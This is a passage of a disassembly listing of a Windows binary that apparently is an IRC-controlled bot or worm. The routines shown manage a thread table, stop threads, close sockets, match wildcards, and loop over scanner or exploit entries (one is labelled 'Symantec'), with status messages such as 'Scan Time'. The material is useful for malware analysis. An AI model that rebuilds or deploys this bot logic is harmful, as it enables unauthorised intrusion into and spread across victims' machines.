loc_40B778: ; CODE XREF: sub_40B687+FD�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_40B778
loc_40B786: ; CODE XREF: sub_40B687+E9�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_40B78B: ; CODE XREF: sub_40B687+61�j
pop esi
leave
retn
sub_40B687 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B78E(char *Source,int,int)
sub_40B78E proc near ; CODE XREF: WinMain(x,x,x,x)+378�p
; WinMain(x,x,x,x)+3B7�p ...
Source = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_456F28
loc_40B796: ; CODE XREF: sub_40B78E+18�j
cmp byte ptr [eax], 0
jz short loc_40B7AA
add eax, 234h
inc edi
cmp eax, offset dword_4E3F28
jl short loc_40B796
jmp short loc_40B7F5
; ---------------------------------------------------------------------------
loc_40B7AA: ; CODE XREF: sub_40B78E+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh ; Count
push [esp+0Ch+Source] ; Source
lea eax, dword_456F28[esi]
push eax ; Dest
call _strncpy
mov eax, [esp+14h+arg_4]
add esp, 0Ch
mov dword_457128[esi], eax
and dword_45712C[esi], 0
mov eax, [esp+8+arg_8]
and dword_457130[esi], 0
mov dword_457134[esi], eax
and byte_457140[esi], 0
pop esi
loc_40B7F5: ; CODE XREF: sub_40B78E+1A�j
mov eax, edi
pop edi
retn
sub_40B78E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B7F9 proc near ; DATA XREF: sub_401CC7+297E�o
var_98 = dword ptr -98h
Str = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
push [ebp+var_10] ; int
mov dword ptr [eax+94h], 1
lea eax, [ebp+Str]
push [ebp+var_C] ; int
push eax ; Str
push [ebp+var_98] ; int
call sub_40B84B
push [ebp+var_14]
call sub_40BAAA
add esp, 14h
push 0
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
sub_40B7F9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B84B(int,char *Str,int,int)
sub_40B84B proc near ; CODE XREF: sub_40B7F9+38�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0 ; int
push [ebp+arg_8] ; int
push offset dword_4491C4 ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
xor edi, edi
mov esi, offset dword_456F28
loc_40B875: ; CODE XREF: sub_40B84B+78�j
cmp byte ptr [esi], 0
jz short loc_40B8B6
cmp [ebp+arg_C], 0
jnz short loc_40B889
cmp dword ptr [esi+204h], 0
jnz short loc_40B8B6
loc_40B889: ; CODE XREF: sub_40B84B+33�j
push esi
push edi
lea eax, [ebp+Dest]
push offset aD_S_0 ; "%d. %s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 24h
loc_40B8B6: ; CODE XREF: sub_40B84B+2D�j
; sub_40B84B+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_4E3F28
jl short loc_40B875
pop edi
pop esi
leave
retn
sub_40B84B endp
; =============== S U B R O U T I N E =======================================
sub_40B8C9 proc near ; CODE XREF: sub_401CC7+7CB3�p
; sub_40B957+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_40B951
cmp esi, 400h
jge short loc_40B951
imul esi, 234h
push edi
push ebx
push dword_45713C[esi]
lea edi, dword_45713C[esi]
call ds:dword_4F63B4 ; TerminateThread
cmp [edi], ebx
jz short loc_40B901
push 1
pop ebp
loc_40B901: ; CODE XREF: sub_40B8C9+33�j
mov [edi], ebx
lea edi, dword_457130[esi]
mov dword_457128[esi], ebx
mov dword_45712C[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_40B922
push eax
call sub_41A8E2
pop ecx
loc_40B922: ; CODE XREF: sub_40B8C9+50�j
mov [edi], ebx
lea edi, dword_457134[esi]
mov byte ptr dword_456F28[esi], bl
mov byte_457140[esi], bl
push dword ptr [edi]
call dword_4E42B8 ; closesocket
lea esi, dword_457138[esi]
mov [edi], ebx
push dword ptr [esi]
call dword_4E42B8 ; closesocket
mov [esi], ebx
pop edi
loc_40B951: ; CODE XREF: sub_40B8C9+D�j
; sub_40B8C9+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_40B8C9 endp
; =============== S U B R O U T I N E =======================================
sub_40B957 proc near ; CODE XREF: sub_401317+18�p
; WinMain(x,x,x,x):loc_4019D3�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_456F28
loc_40B963: ; CODE XREF: sub_40B957+2A�j
cmp byte ptr [esi], 0
jz short loc_40B974
push edi
call sub_40B8C9
test eax, eax
pop ecx
jz short loc_40B974
inc ebx
loc_40B974: ; CODE XREF: sub_40B957+F�j
; sub_40B957+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_4E3F28
jl short loc_40B963
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_40B957 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B989 proc near ; CODE XREF: sub_401CC7+420D�p
; sub_401CC7+435D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_45712C
loc_40B99D: ; CODE XREF: sub_40B989+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_40B9BF
test edi, edi
jle short loc_40B9B1
cmp [esi], edi
jz short loc_40B9B1
cmp ebx, edi
jnz short loc_40B9BF
loc_40B9B1: ; CODE XREF: sub_40B989+1E�j
; sub_40B989+22�j
push ebx
call sub_40B8C9
test eax, eax
pop ecx
jz short loc_40B9BF
inc [ebp+var_4]
loc_40B9BF: ; CODE XREF: sub_40B989+1A�j
; sub_40B989+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_4E412C
jl short loc_40B99D
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_40B989 endp
; =============== S U B R O U T I N E =======================================
sub_40B9D6 proc near ; CODE XREF: WinMain(x,x,x,x)+40F�p
; sub_401CC7+946�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_457128
loc_40B9DD: ; CODE XREF: sub_40B9D6+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_40B9E6
inc eax
loc_40B9E6: ; CODE XREF: sub_40B9D6+D�j
add ecx, 234h
cmp ecx, offset dword_4E4128
jl short loc_40B9DD
retn
sub_40B9D6 endp
; =============== S U B R O U T I N E =======================================
sub_40B9F5 proc near ; CODE XREF: sub_401CC7+23F3�p
arg_0 = dword ptr 4
xor eax, eax
push esi
xor edx, edx
mov ecx, offset dword_457128
loc_40B9FF: ; CODE XREF: sub_40B9F5+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_40BA18
add ecx, 234h
inc edx
cmp ecx, offset dword_4E4128
jl short loc_40B9FF
pop esi
retn
; ---------------------------------------------------------------------------
loc_40BA18: ; CODE XREF: sub_40B9F5+10�j
mov eax, edx
pop esi
retn
sub_40B9F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BA1C(int,int,int,int,int,int,int,char *Str)
sub_40BA1C proc near ; CODE XREF: sub_401CC7+122D�p
; sub_401CC7+124B�p ...
Dest = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
Str = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+Str], eax
jz short loc_40BA35
push [ebp+Str] ; Str
call _atoi
pop ecx
loc_40BA35: ; CODE XREF: sub_40BA1C+E�j
push eax
push [ebp+arg_18]
call sub_40B989
pop ecx
test eax, eax
pop ecx
jle short loc_40BA61
push eax
lea eax, [ebp+Dest]
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s %s stopped. (%d thread(s) stopped.)"
push eax ; Dest
call _sprintf
add esp, 14h
jmp short loc_40BA7B
; ---------------------------------------------------------------------------
loc_40BA61: ; CODE XREF: sub_40BA1C+26�j
push [ebp+arg_14]
lea eax, [ebp+Dest]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s No %s thread found."
push eax ; Dest
call _sprintf
add esp, 10h
loc_40BA7B: ; CODE XREF: sub_40BA1C+43�j
cmp [ebp+arg_C], 0
jnz short loc_40BA9B
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
loc_40BA9B: ; CODE XREF: sub_40BA1C+63�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
pop ecx
leave
retn
sub_40BA1C endp
; =============== S U B R O U T I N E =======================================
sub_40BAAA proc near ; CODE XREF: sub_4019E7+159�p
; sub_40B7F9+40�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov dword_45713C[eax], ecx
mov dword_457128[eax], ecx
mov dword_45712C[eax], ecx
mov dword_457130[eax], ecx
mov dword_457134[eax], ecx
mov dword_457138[eax], ecx
mov byte ptr dword_456F28[eax], cl
mov byte_457140[eax], cl
retn
sub_40BAAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BAE7 proc near ; CODE XREF: sub_401CC7+7F34�p
; sub_40BC15+6B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 1
pop eax
loc_40BAF1: ; CODE XREF: sub_40BAE7+68�j
mov cl, [esi]
test cl, cl
jz short loc_40BB51
cmp eax, 1
jnz short loc_40BB51
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_40BB51
cmp cl, 2Ah
jz short loc_40BB38
cmp cl, 3Fh
jz short loc_40BB1B
cmp cl, 5Bh
jz short loc_40BB20
xor eax, eax
cmp cl, dl
setz al
loc_40BB1B: ; CODE XREF: sub_40BAE7+26�j
inc [ebp+arg_4]
jmp short loc_40BB4B
; ---------------------------------------------------------------------------
loc_40BB20: ; CODE XREF: sub_40BAE7+2B�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_40BB7D
mov esi, [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_40BB4B
; ---------------------------------------------------------------------------
loc_40BB38: ; CODE XREF: sub_40BAE7+21�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_40BC15
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_40BB4B: ; CODE XREF: sub_40BAE7+37�j
; sub_40BAE7+4F�j
inc esi
mov [ebp+arg_0], esi
jmp short loc_40BAF1
; ---------------------------------------------------------------------------
loc_40BB51: ; CODE XREF: sub_40BAE7+E�j
; sub_40BAE7+13�j ...
cmp byte ptr [esi], 2Ah
jnz short loc_40BB61
cmp eax, 1
jnz short loc_40BB78
inc esi
mov [ebp+arg_0], esi
jmp short loc_40BB51
; ---------------------------------------------------------------------------
loc_40BB61: ; CODE XREF: sub_40BAE7+6D�j
cmp eax, 1
jnz short loc_40BB78
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_40BB78
cmp byte ptr [esi], 0
jnz short loc_40BB78
push 1
pop eax
jmp short loc_40BB7A
; ---------------------------------------------------------------------------
loc_40BB78: ; CODE XREF: sub_40BAE7+72�j
; sub_40BAE7+7D�j ...
xor eax, eax
loc_40BB7A: ; CODE XREF: sub_40BAE7+8F�j
pop esi
pop ebp
retn
sub_40BAE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BB7D proc near ; CODE XREF: sub_40BAE7+45�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
push 1
mov ecx, [edx]
and [ebp+var_8], edi
pop eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_40BB9E
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_40BB9E: ; CODE XREF: sub_40BB7D+19�j
push ebx
push esi
loc_40BBA0: ; CODE XREF: sub_40BB7D+7B�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_40BBAE
cmp [ebp+var_4], eax
jnz short loc_40BBFA
loc_40BBAE: ; CODE XREF: sub_40BB7D+2A�j
test edi, edi
jnz short loc_40BBEF
cmp bl, 2Dh
jnz short loc_40BBE3
mov al, [ecx+1]
lea esi, [ecx+1]
mov cl, [ecx-1]
cmp cl, al
jge short loc_40BBE3
cmp al, 5Dh
jz short loc_40BBE3
cmp [ebp+var_4], edi
jnz short loc_40BBE3
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_40BBEF
cmp bl, al
jg short loc_40BBEF
push 1
mov [edx], esi
pop edi
jmp short loc_40BBEF
; ---------------------------------------------------------------------------
loc_40BBE3: ; CODE XREF: sub_40BB7D+38�j
; sub_40BB7D+45�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_40BBEF
push 1
pop edi
loc_40BBEF: ; CODE XREF: sub_40BB7D+33�j
; sub_40BB7D+59�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
push 1
pop eax
jmp short loc_40BBA0
; ---------------------------------------------------------------------------
loc_40BBFA: ; CODE XREF: sub_40BB7D+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_40BC07
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_40BC07: ; CODE XREF: sub_40BB7D+82�j
cmp edi, eax
jnz short loc_40BC10
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_40BC10: ; CODE XREF: sub_40BB7D+8C�j
mov eax, edi
pop edi
leave
retn
sub_40BB7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BC15 proc near ; CODE XREF: sub_40BAE7+59�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
xor ebx, ebx
loc_40BC31: ; CODE XREF: sub_40BC15+3A�j
cmp [eax], bl
jz short loc_40BC51
mov cl, [ecx]
cmp cl, 3Fh
jz short loc_40BC46
cmp cl, 2Ah
jnz short loc_40BC51
cmp cl, 3Fh
jnz short loc_40BC49
loc_40BC46: ; CODE XREF: sub_40BC15+25�j
inc eax
mov [edi], eax
loc_40BC49: ; CODE XREF: sub_40BC15+2F�j
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
jmp short loc_40BC31
; ---------------------------------------------------------------------------
loc_40BC51: ; CODE XREF: sub_40BC15+1E�j
; sub_40BC15+2A�j ...
mov eax, [esi]
cmp byte ptr [eax], 2Ah
jnz short loc_40BC5C
inc dword ptr [esi]
jmp short loc_40BC51
; ---------------------------------------------------------------------------
loc_40BC5C: ; CODE XREF: sub_40BC15+41�j
mov eax, [edi]
mov cl, [eax]
cmp cl, bl
jnz short loc_40BC7D
mov edx, [esi]
cmp [edx], bl
jz short loc_40BC6E
xor eax, eax
jmp short loc_40BCDD
; ---------------------------------------------------------------------------
loc_40BC6E: ; CODE XREF: sub_40BC15+53�j
cmp cl, bl
jnz short loc_40BC7D
mov ecx, [esi]
cmp [ecx], bl
jnz short loc_40BC7D
push 1
pop eax
jmp short loc_40BCDD
; ---------------------------------------------------------------------------
loc_40BC7D: ; CODE XREF: sub_40BC15+4D�j
; sub_40BC15+5B�j ...
push eax
push dword ptr [esi]
call sub_40BAE7
pop ecx
test eax, eax
pop ecx
jnz short loc_40BCC7
loc_40BC8B: ; CODE XREF: sub_40BC15+B0�j
inc dword ptr [edi]
mov eax, [edi]
loc_40BC8F: ; CODE XREF: sub_40BC15+90�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jz short loc_40BCA7
cmp cl, 5Bh
jz short loc_40BCA7
cmp dl, bl
jz short loc_40BCA7
inc eax
mov [edi], eax
jmp short loc_40BC8F
; ---------------------------------------------------------------------------
loc_40BCA7: ; CODE XREF: sub_40BC15+82�j
; sub_40BC15+87�j ...
mov eax, [edi]
cmp [eax], bl
jz short loc_40BCBE
push eax
push dword ptr [esi]
call sub_40BAE7
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40BCC3
; ---------------------------------------------------------------------------
loc_40BCBE: ; CODE XREF: sub_40BC15+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_40BCC3: ; CODE XREF: sub_40BC15+A7�j
cmp eax, ebx
jnz short loc_40BC8B
loc_40BCC7: ; CODE XREF: sub_40BC15+74�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_40BCDA
mov eax, [esi]
cmp [eax], bl
jnz short loc_40BCDA
mov [ebp+var_4], 1
loc_40BCDA: ; CODE XREF: sub_40BC15+B6�j
; sub_40BC15+BC�j
mov eax, [ebp+var_4]
loc_40BCDD: ; CODE XREF: sub_40BC15+57�j
; sub_40BC15+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_40BC15 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BCE2(int,char *Str,int)
sub_40BCE2 proc near ; CODE XREF: sub_401CC7+2AEA�p
Source = byte ptr -400h
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+Dest]
push offset asc_4495D8 ; "-"
push eax ; Dest
xor ebx, ebx
call _sprintf
cmp dword_449248, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40BD54
push esi
mov esi, offset dword_449250
loc_40BD15: ; CODE XREF: sub_40BCE2+6F�j
mov eax, [esi]
test eax, eax
jbe short loc_40BD4A
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+Source]
push offset asc_4495F8 ; " "
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push edi ; Count
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
add esp, 1Ch
loc_40BD4A: ; CODE XREF: sub_40BCE2+37�j
add esi, 40h
cmp dword ptr [esi-8], 0
jnz short loc_40BD15
pop esi
loc_40BD54: ; CODE XREF: sub_40BCE2+2B�j
push dword_4E3F2C
call sub_41B7A7
pop ecx
push eax
push ebx
lea eax, [ebp+Source]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push edi ; Count
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
lea eax, [ebp+Dest]
push eax
call sub_415C77
add esp, 34h
pop edi
pop ebx
leave
retn
sub_40BCE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BDB1(int,char *Str,int)
sub_40BDB1 proc near ; CODE XREF: sub_401CC7+2AD4�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
mov eax, dword_4E6D40
mov ecx, dword_4E6D3C
push esi
push dword_4E3F2C
lea esi, [ecx+eax]
call sub_41B7A7
pop ecx
push eax
push esi
push dword_4E6D40
lea eax, [ebp+Dest]
push dword_4E6D3C
push offset asc_449618 ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
lea eax, [ebp+Dest]
push eax
call sub_415C77
add esp, 30h
pop esi
leave
retn
sub_40BDB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BE1D(int,char *Str,int)
sub_40BE1D proc near ; CODE XREF: sub_401CC7+2ABE�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push dword_4E3F2C
call sub_41B7A7
pop ecx
push eax
lea eax, [ebp+Dest]
push dword_4E6F9C
push offset asc_449660 ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
lea eax, [ebp+Dest]
push eax
call sub_415C77
add esp, 28h
leave
retn
sub_40BE1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BE72(int,char *Str,int)
sub_40BE72 proc near ; CODE XREF: sub_401CC7+2AA8�p
Source = byte ptr -1000h
Dest = byte ptr -800h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 1000h
call __alloca_probe
push edi
lea eax, [ebp+Dest]
push offset asc_44968C ; "-"
push eax ; Dest
call _sprintf
cmp dword_449248, 0
pop ecx
pop ecx
mov edi, 800h
jz short loc_40BEDE
push esi
mov esi, offset aSymantec ; "Symantec"
loc_40BEA7: ; CODE XREF: sub_40BE72+69�j
lea eax, [esi-0Ah]
push eax
push esi
lea eax, [ebp+Source]
push offset asc_4496A8 ; " "
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push edi ; Count
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
add esi, 40h
add esp, 1Ch
cmp dword ptr [esi+1Eh], 0
jnz short loc_40BEA7
pop esi
loc_40BEDE: ; CODE XREF: sub_40BE72+2D�j
push dword_4E3F2C
call sub_41B7A7
pop ecx
push eax
lea eax, [ebp+Source]
push offset aScanTimeS_ ; " Scan Time: %s."
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push edi ; Count
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
lea eax, [ebp+Dest]
push eax
call sub_415C77
add esp, 30h
pop edi
leave
retn
sub_40BE72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BF39 proc near ; DATA XREF: sub_401CC7+30F5�o
Dest = byte ptr -3F0h
var_1F0 = dword ptr -1F0h
var_1EC = byte ptr -1ECh
var_1DC = byte ptr -1DCh
var_15C = byte ptr -15Ch
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
Format = byte ptr -134h
Str = byte ptr -124h
var_A4 = byte ptr -0A4h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3F0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Bh
mov esi, eax
pop ecx
lea edi, [ebp+Format]
rep movsd
mov dword ptr [eax+128h], 1
lea eax, [ebp+Format]
push eax
call dword_4E4260 ; inet_addr
xor edi, edi
mov [ebp+var_8], eax
cmp dword_449248, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], edi
jz loc_40C09B
mov ebx, offset dword_449248
mov eax, ebx
loc_40BF8A: ; CODE XREF: sub_40BF39+15C�j
push [ebp+var_1C]
push dword ptr [eax]
push [ebp+var_8]
call sub_40C71F
add esp, 0Ch
cmp eax, 1
jnz loc_40C08B
push dword ptr [ebx]
lea esi, [ebx-28h]
lea eax, [ebp+Format]
push eax
lea eax, [esi+0Ah]
push eax
lea eax, [ebp+Dest]
push offset asc_4496C8 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_24] ; int
call sub_409D6C
lea eax, [ebp+Dest]
push eax
call sub_415C77
add esp, 2Ch
lea eax, [ebp+Format]
push eax ; Format
lea eax, [ebp+var_1EC]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_15C]
pop ecx
push esi ; Format
push eax ; Dest
call _sprintf
cmp [ebp+var_A4], 0
pop ecx
pop ecx
lea eax, [ebp+var_A4]
jnz short loc_40C026
lea eax, [ebp+Str]
loc_40C026: ; CODE XREF: sub_40BF39+E5�j
push eax ; Format
lea eax, [ebp+var_1DC]
push eax ; Dest
call _sprintf
mov eax, [ebp+var_24]
pop ecx
mov [ebp+var_1F0], eax
mov eax, [ebp+var_14]
mov [ebp+var_140], eax
mov eax, [ebp+var_10]
pop ecx
mov [ebp+var_13C], eax
mov eax, [ebx]
sub esp, 0BCh
mov [ebp+var_150], eax
mov eax, [ebp+var_18]
push 2Fh
mov [ebp+var_14C], eax
mov eax, [ebp+arg_0]
pop ecx
lea esi, [ebp+var_1F0]
mov edi, esp
mov [ebp+var_148], eax
rep movsd
call dword ptr [ebx+4]
add esp, 0BCh
inc [ebp+var_4]
xor edi, edi
loc_40C08B: ; CODE XREF: sub_40BF39+64�j
inc [ebp+arg_0]
add ebx, 40h
mov eax, ebx
cmp [ebx], edi
jnz loc_40BF8A
loc_40C09B: ; CODE XREF: sub_40BF39+44�j
push [ebp+var_4]
lea eax, [ebp+Format]
push eax
lea eax, [ebp+Dest]
push offset asc_4496F8 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_24] ; int
call sub_409D6C
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_18]
call sub_40BAAA
add esp, 2Ch
push edi
call ds:dword_4F63D4 ; ExitThread
sub_40BF39 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40C0EE(int,char *Str,int,int)
sub_40C0EE proc near ; CODE XREF: sub_401CC7+240E�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 0Bh
call sub_40B9D6
test eax, eax
pop ecx
jle short loc_40C12A
mov eax, [ebp+arg_C]
push dword_4E4380[eax*8]
call dword_4E42AC ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_44972C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_40C13D
; ---------------------------------------------------------------------------
loc_40C12A: ; CODE XREF: sub_40C0EE+13�j
lea eax, [ebp+Dest]
push offset asc_449748 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40C13D: ; CODE XREF: sub_40C0EE+3A�j
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
lea eax, [ebp+Dest]
push eax
call sub_415C77
add esp, 18h
leave
retn
sub_40C0EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40C165(int,int,int,int,char Format,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_40C165 proc near ; CODE XREF: sub_40CBA1+4F�p
var_210 = dword ptr -210h
Source = byte ptr -204h
var_4 = byte ptr -4
Format = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
push ebx
cmp eax, 0FFFFFFFFh
push esi
jz loc_40C637
shl eax, 6
xor ebx, ebx
cmp dword_449254[eax], ebx
jz loc_40C637
push 5
call sub_40B9D6
test eax, eax
pop ecx
